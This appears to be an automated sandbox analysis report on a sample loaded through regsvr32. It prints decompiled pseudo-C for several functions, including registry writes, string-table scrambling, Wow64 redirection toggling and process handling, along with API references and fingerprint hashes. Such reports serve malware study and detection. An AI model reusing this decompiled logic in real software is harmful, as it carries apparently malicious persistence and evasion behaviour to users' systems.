				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x1aa38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E001A5691( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E001A611E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E001A77EC(_a8);
						goto L29;
					}
					_t64 =  *0x1aa2cc; // 0x32f9f00
					_t16 = _t64 + 0xc; // 0x32f9ff1
					_t65 = E001A5691(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d001a90
						if(E001A2A18(_t97,  *_t33, _t91, _a8,  *0x1aa384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x1aa2d4; // 0x314d7d0
							if(_t98 == 0) {
								_t35 = _t68 + 0x1ab9ef; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x1ab907; // 0x55434b48
								_t69 = _t34;
							}
							if(E001A3D9E(_t69,  *0x1aa384,  *0x1aa388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x1aa2d4; // 0x314d7d0
									_t44 = _t71 + 0x1ab892; // 0x74666f53
									_t73 = E001A5691(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d001a90
										E001A2A5C( *_t47, _t91, _a8,  *0x1aa388, _a24);
										_t49 = _t101 + 0x10; // 0x3d001a90
										E001A2A5C( *_t49, _t91, _t99,  *0x1aa380, _a16);
										E001A77EC(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d001a90
									E001A2A5C( *_t40, _t91, _a8,  *0x1aa388, _a24);
									_t43 = _t101 + 0x10; // 0x3d001a90
									E001A2A5C( *_t43, _t91, _a8,  *0x1aa380, _a16);
								}
								if( *_t101 != 0) {
									E001A77EC(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d001a90
					_t81 = E001A15D7( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d001a90
							E001A2A18(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E001A77EC(_t100);
						_t98 = _a16;
					}
					E001A77EC(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E001A7801(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x1aa38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                    0x001a5afa
                                    0x001a5b03
                                    0x001a5b0a
                                    0x001a5b0f
                                    0x001a5b7c
                                    0x001a5b82
                                    0x001a5b87
                                    0x001a5b8e
                                    0x001a5b95
                                    0x001a5b98
                                    0x001a5d03
                                    0x001a5d0a
                                    0x001a5d0a
                                    0x001a5d0f
                                    0x001a5d11
                                    0x001a5d11
                                    0x001a5d1a
                                    0x001a5d1a
                                    0x001a5b9e
                                    0x001a5baa
                                    0x001a5cf9
                                    0x001a5cfc
                                    0x00000000
                                    0x001a5cfc
                                    0x001a5bb0
                                    0x001a5bb5
                                    0x001a5bb8
                                    0x001a5bbf
                                    0x001a5bc2
                                    0x001a5c0b
                                    0x001a5c0b
                                    0x001a5c1e
                                    0x001a5c28
                                    0x001a5c30
                                    0x001a5c35
                                    0x001a5c3f
                                    0x001a5c3f
                                    0x001a5c37
                                    0x001a5c37
                                    0x001a5c37
                                    0x001a5c37
                                    0x001a5c61
                                    0x001a5c69
                                    0x001a5c97
                                    0x001a5c9c
                                    0x001a5ca3
                                    0x001a5ca8
                                    0x001a5cac
                                    0x001a5cde
                                    0x001a5cae
                                    0x001a5cbb
                                    0x001a5cbe
                                    0x001a5cce
                                    0x001a5cd1
                                    0x001a5cd7
                                    0x001a5cd7
                                    0x001a5c6b
                                    0x001a5c78
                                    0x001a5c7b
                                    0x001a5c8d
                                    0x001a5c90
                                    0x001a5c90
                                    0x001a5ce8
                                    0x001a5cf4
                                    0x001a5cea
                                    0x001a5ced
                                    0x001a5ced
                                    0x001a5ce8
                                    0x001a5c61
                                    0x00000000
                                    0x001a5c28
                                    0x001a5bd1
                                    0x001a5bd4
                                    0x001a5bdb
                                    0x001a5be1
                                    0x001a5be4
                                    0x001a5be6
                                    0x001a5bf2
                                    0x001a5bf5
                                    0x001a5bf5
                                    0x001a5bfb
                                    0x001a5c00
                                    0x001a5c00
                                    0x001a5c06
                                    0x00000000
                                    0x001a5c06
                                    0x001a5b14
                                    0x00000000
                                    0x001a5b3b
                                    0x001a5b3b
                                    0x001a5b47
                                    0x001a5b5a
                                    0x001a5b60
                                    0x001a5b68
                                    0x00000000
                                    0x001a5b68

                                    APIs
                                    • StrChrA.SHLWAPI(001A17B3,0000005F), ref: 001A5B2D
                                    • lstrcpy.KERNEL32(?,?), ref: 001A5B5A
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                      • Part of subcall function 001A2A5C: lstrlenW.KERNEL32(?,?,?,001A5CC3,3D001A90,80000002,001A17B3,001A462D,74666F53,4D4C4B48,001A462D,?,3D001A90,80000002,001A17B3,?), ref: 001A2A81
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • lstrcpy.KERNEL32(?,00000000), ref: 001A5B7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                    • String ID: ($\
                                    • API String ID: 3924217599-1512714803
                                    • Opcode ID: 02c3a98ad7e9fa503d07c0738476989574f4cc39ff86b24baca43223242d651c
                                    • Instruction ID: a8a14c0977b8260ed3d374f75ec3710ff13226f69cffd705c2c15a4fdf028179
                                    • Opcode Fuzzy Hash: 02c3a98ad7e9fa503d07c0738476989574f4cc39ff86b24baca43223242d651c
                                    • Instruction Fuzzy Hash: 74519B7A104609FFCF229FA0DC44EAA3BBEFF1A320F108414FA1696565D735DA65EB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A1697, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 32%
                                    			E001A1697(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E001A19B4(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x1aa2d4; // 0x314d7d0
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x1ab4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x1ab90c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x1aa100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                    0x001a1697
                                    0x001a169e
                                    0x001a16a2
                                    0x001a16a7
                                    0x001a16ae
                                    0x001a16b1
                                    0x001a16bb
                                    0x001a16c0
                                    0x001a16cc
                                    0x001a16d3
                                    0x001a16dd
                                    0x001a16dd
                                    0x001a16d5
                                    0x001a16d5
                                    0x001a16d5
                                    0x001a16d5
                                    0x001a16e3
                                    0x001a16e6
                                    0x001a16ee
                                    0x001a16f1
                                    0x001a16f4
                                    0x001a16f7
                                    0x001a16fc
                                    0x001a1705
                                    0x001a1712
                                    0x001a1707
                                    0x001a170d
                                    0x001a170d
                                    0x001a1718
                                    0x001a1718
                                    0x001a1720

                                    APIs
                                      • Part of subcall function 001A19B4: SysAllocString.OLEAUT32(?), ref: 001A1A10
                                      • Part of subcall function 001A19B4: SysAllocString.OLEAUT32(0070006F), ref: 001A1A24
                                      • Part of subcall function 001A19B4: SysAllocString.OLEAUT32(00000000), ref: 001A1A36
                                      • Part of subcall function 001A19B4: SysFreeString.OLEAUT32(00000000), ref: 001A1A9A
                                    • memset.NTDLL ref: 001A16BB
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 001A16F7
                                    • GetLastError.KERNEL32 ref: 001A1707
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 001A1718
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                    • String ID: <
                                    • API String ID: 593937197-4251816714
                                    • Opcode ID: 40acbde511872c8891d0587b5380ff733b3d9aae68da930a2258006996dc6c96
                                    • Instruction ID: 22dd5eb1d61d056604782d52eea380cc5966f06007d45bd70c69bdeef878afcb
                                    • Opcode Fuzzy Hash: 40acbde511872c8891d0587b5380ff733b3d9aae68da930a2258006996dc6c96
                                    • Instruction Fuzzy Hash: C81179B5900208BBDB10DFA9D884BDA7BBCBB0A380F148016F909E7291D774A544CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A1ADC, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 22%
                                    			E001A1ADC(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E001A77D7(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E001A77EC(_v16);
								goto L37;
							}
							_t103 = E001A77D7((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x1aa2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                    0x001a1ae3
                                    0x001a1aea
                                    0x001a1aef
                                    0x001a1af2
                                    0x001a1af9
                                    0x001a1afc
                                    0x001a1aff
                                    0x001a1b06
                                    0x001a1b09
                                    0x001a1c5d
                                    0x001a1c5f
                                    0x001a1c61
                                    0x001a1c66
                                    0x001a1c66
                                    0x001a1b0f
                                    0x001a1b12
                                    0x001a1b15
                                    0x001a1b17
                                    0x001a1b17
                                    0x001a1b1b
                                    0x00000000
                                    0x00000000
                                    0x001a1b1f
                                    0x001a1b4b
                                    0x001a1b50
                                    0x001a1b52
                                    0x001a1b52
                                    0x001a1b55
                                    0x001a1b58
                                    0x001a1b58
                                    0x001a1b5a
                                    0x00000000
                                    0x001a1b25
                                    0x001a1b27
                                    0x001a1b46
                                    0x001a1b46
                                    0x001a1b5d
                                    0x001a1b5d
                                    0x001a1b5e
                                    0x001a1b5e
                                    0x001a1b61
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a1b61
                                    0x001a1b2b
                                    0x001a1b72
                                    0x001a1b76
                                    0x001a1c50
                                    0x001a1c52
                                    0x001a1c52
                                    0x001a1c53
                                    0x001a1c56
                                    0x00000000
                                    0x001a1c56
                                    0x001a1b90
                                    0x001a1b94
                                    0x001a1c4c
                                    0x00000000
                                    0x001a1c4c
                                    0x001a1b9a
                                    0x001a1b9d
                                    0x001a1ba1
                                    0x001a1ba7
                                    0x001a1baa
                                    0x001a1c42
                                    0x001a1c42
                                    0x00000000
                                    0x001a1c48
                                    0x001a1bb5
                                    0x001a1bbe
                                    0x001a1bd2
                                    0x001a1bd9
                                    0x001a1bee
                                    0x001a1bf4
                                    0x001a1bfc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a1bfe
                                    0x001a1bfe
                                    0x001a1bfe
                                    0x001a1c05
                                    0x001a1c0d
                                    0x00000000
                                    0x00000000
                                    0x001a1c0f
                                    0x001a1c18
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a1c1a
                                    0x001a1c1c
                                    0x001a1c1f
                                    0x001a1c1f
                                    0x001a1c22
                                    0x001a1c26
                                    0x001a1c29
                                    0x001a1c2f
                                    0x001a1c32
                                    0x001a1c39
                                    0x00000000
                                    0x001a1bb5
                                    0x001a1b30
                                    0x001a1b3b
                                    0x001a1b3e
                                    0x001a1b40
                                    0x001a1b40
                                    0x001a1b43
                                    0x001a1b45
                                    0x00000000
                                    0x001a1b45
                                    0x001a1b1f
                                    0x001a1b65
                                    0x001a1b6a
                                    0x001a1b6c
                                    0x001a1b6c
                                    0x001a1b6f
                                    0x001a1b6f
                                    0x00000000

                                    APIs
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 001A1BD9
                                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 001A1BEE
                                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 001A1C05
                                    • lstrlen.KERNEL32(69B25F45), ref: 001A1C29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3214092121-3916222277
                                    • Opcode ID: 85ff2b6144c238a96e8bc996e505e437a4119be6818ece9fe048d9b76f8968da
                                    • Instruction ID: 4cc33db26f910abfde7c8f4ea7333c7d605ec0d14d8d8a77c528455fa53a7bfd
                                    • Opcode Fuzzy Hash: 85ff2b6144c238a96e8bc996e505e437a4119be6818ece9fe048d9b76f8968da
                                    • Instruction Fuzzy Hash: A651F539A40208FFCF10CF98C9846ADBBBAFF46360F15C05AE8159B251D730AA41CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A4EEF, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E001A4EEF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E001A77D7(_t2);
				if(_t34 != 0) {
					_t30 = E001A77D7(_t28);
					if(_t30 == 0) {
						E001A77EC(_t34);
					} else {
						_t39 = _a4;
						_t22 = E001A783A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E001A783A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                    0x001a4eef
                                    0x001a4ef9
                                    0x001a4efb
                                    0x001a4f01
                                    0x001a4f01
                                    0x001a4f0a
                                    0x001a4f0e
                                    0x001a4f1a
                                    0x001a4f1e
                                    0x001a4f92
                                    0x001a4f20
                                    0x001a4f20
                                    0x001a4f24
                                    0x001a4f2b
                                    0x001a4f2e
                                    0x001a4f48
                                    0x001a4f37
                                    0x001a4f37
                                    0x001a4f3b
                                    0x001a4f3e
                                    0x001a4f43
                                    0x001a4f43
                                    0x001a4f4d
                                    0x001a4f75
                                    0x001a4f7b
                                    0x001a4f7e
                                    0x001a4f4f
                                    0x001a4f51
                                    0x001a4f59
                                    0x001a4f64
                                    0x001a4f69
                                    0x001a4f69
                                    0x001a4f85
                                    0x001a4f8c
                                    0x001a4f8d
                                    0x001a4f8d
                                    0x001a4f1e
                                    0x001a4f9d

                                    APIs
                                    • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,001A69C2,00000000,00000000,00000000,032F98C0,?,?,001A3771,?,032F98C0), ref: 001A4EFB
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                      • Part of subcall function 001A783A: StrChrA.SHLWAPI(?,0000002F), ref: 001A7848
                                      • Part of subcall function 001A783A: StrChrA.SHLWAPI(?,0000003F), ref: 001A7852
                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001A69C2,00000000,00000000,00000000,032F98C0,?,?,001A3771), ref: 001A4F59
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 001A4F69
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 001A4F75
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                    • String ID: b+t
                                    • API String ID: 3767559652-83008628
                                    • Opcode ID: 70714f91bbb24cb0420505dd03d2553861ca8c746855668912c9ed46135fdb60
                                    • Instruction ID: 78407025f10b948320bde9822325c9d2905819a9493c3343fb3400653cd56d9f
                                    • Opcode Fuzzy Hash: 70714f91bbb24cb0420505dd03d2553861ca8c746855668912c9ed46135fdb60
                                    • Instruction Fuzzy Hash: 8121AF7A504255AFCB025F68CC88AAF7FACAF57390F159094F9089B212DB74CA40C7E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C83D2, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 6E2C83DB
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E2C83FE
                                      • Part of subcall function 6E2C6950: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E2C6982
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E2C8424
                                    • _free.LIBCMT ref: 6E2C8437
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E2C8446
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: d444b5575eeb802b250e98497673b8c9a7b7a23817788829ce94adfdfd434894
                                    • Instruction ID: 1b734d49a8305e8f992c2543d0b3e512dd12441ee4d3843b40d8b280f15d9c11
                                    • Opcode Fuzzy Hash: d444b5575eeb802b250e98497673b8c9a7b7a23817788829ce94adfdfd434894
                                    • Instruction Fuzzy Hash: 8A019272601A1A7B27A516FADC8DC7B2A6EDBC2EA13554228B918D3100DE609C0181B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C6DC0, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,6E2C75B2,6E2C6993,?,?,6E2C382D,?), ref: 6E2C6DC5
                                    • _free.LIBCMT ref: 6E2C6DFA
                                    • _free.LIBCMT ref: 6E2C6E21
                                    • SetLastError.KERNEL32(00000000), ref: 6E2C6E2E
                                    • SetLastError.KERNEL32(00000000), ref: 6E2C6E37
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: aa0031677a3b4547e02c31454ab481070e75c626e079e7ed27bc85819a246c3e
                                    • Instruction ID: 268eee2d01c56333cb57c9f6b67c42472556e40962f58a0c5b9f239cb29643b5
                                    • Opcode Fuzzy Hash: aa0031677a3b4547e02c31454ab481070e75c626e079e7ed27bc85819a246c3e
                                    • Instruction Fuzzy Hash: 2501D6361B49096BD6D216F9CCCDD6B236FDBC2F7A7240729F51992184EBA5CC0181B3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2CA435, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 6E2CA44D
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2CA45F
                                    • _free.LIBCMT ref: 6E2CA471
                                    • _free.LIBCMT ref: 6E2CA483
                                    • _free.LIBCMT ref: 6E2CA495
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: ec1189b3d21de8e687a229b1b7c7e399505192bc5d456097c706189c02baab46
                                    • Instruction ID: 6b4cc89b569b84462a250d8c2d96eec2ad255cbea6bb4c7962f6181d06c2f8c1
                                    • Opcode Fuzzy Hash: ec1189b3d21de8e687a229b1b7c7e399505192bc5d456097c706189c02baab46
                                    • Instruction Fuzzy Hash: B4F0E17195464D978AD0DBE9E4DEC5673DFEA01F257604D05F06BD7540CB20F8808EE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A6707, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A6707(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x1aa2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x1aa2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x1aa2b0 = _t6;
				 *0x1aa2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x1aa2ac = _t7;
				if(_t7 == 0) {
					 *0x1aa2ac =  *0x1aa2ac | 0xffffffff;
				}
				return 0;
			}








                                    0x001a670f
                                    0x001a6717
                                    0x001a671c
                                    0x00000000
                                    0x001a6769
                                    0x001a671e
                                    0x001a6726
                                    0x001a6766
                                    0x00000000
                                    0x001a6766
                                    0x001a6728
                                    0x001a672d
                                    0x001a673f
                                    0x001a6744
                                    0x001a674a
                                    0x001a6752
                                    0x001a6757
                                    0x001a6759
                                    0x001a6759
                                    0x00000000

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001A6671,?,?,00000001), ref: 001A670F
